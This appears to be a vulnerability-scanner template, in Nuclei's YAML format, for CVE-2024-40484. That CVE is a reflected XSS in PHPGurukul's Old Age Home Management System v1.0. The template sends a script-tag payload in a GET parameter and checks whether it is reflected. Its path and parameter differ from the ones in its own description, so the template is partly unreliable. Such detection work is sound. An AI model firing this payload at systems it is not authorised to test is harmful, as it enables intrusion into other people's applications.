-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathCVE-2024-40484.yaml
35 lines (32 loc) · 1.42 KB
/
CVE-2024-40484.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
id: CVE-2024-40484
info:
name: Reflected XSS in Old Age Home Management System v1.0
author: ProjectDiscoveryAI
severity: medium
description: A Reflected Cross Site Scripting (XSS) vulnerability in "/oahms/search.php" in PHPGurukul Old Age Home Management System v1.0 allows remote attackers to execute arbitrary code via the "searchdata" parameter.
impact: |
Successful exploitation could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to account takeover, sensitive data theft, or further attacks.
remediation: |
Implement proper input validation and output encoding to prevent XSS attacks in the Old Age Home Management System v1.0.
reference:
- https://github.com/takekaramey/CVE_Writeup/blob/main/PHPGurukul/Old%20Age%20Home%20Mgmt%20System%20v1.0/Reflected%20XSS.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-40484
cwe-id: CWE-79
epss-score: 0.00046
epss-percentile: 0.18638
cpe: cpe:2.3:a:phpgurukul:old_age_home_management_system:1.0:*:*:*:*:*:*:*
metadata:
vendor: phpgurukul
product: old_age_home_management_system
http:
- method: GET
path:
- "{{BaseURL}}/old_age_home_mgmt_system/search.php?search_query=<script>alert('XSS')</script>"
matchers:
- type: word
words:
- "<script>alert('XSS')</script>"
part: body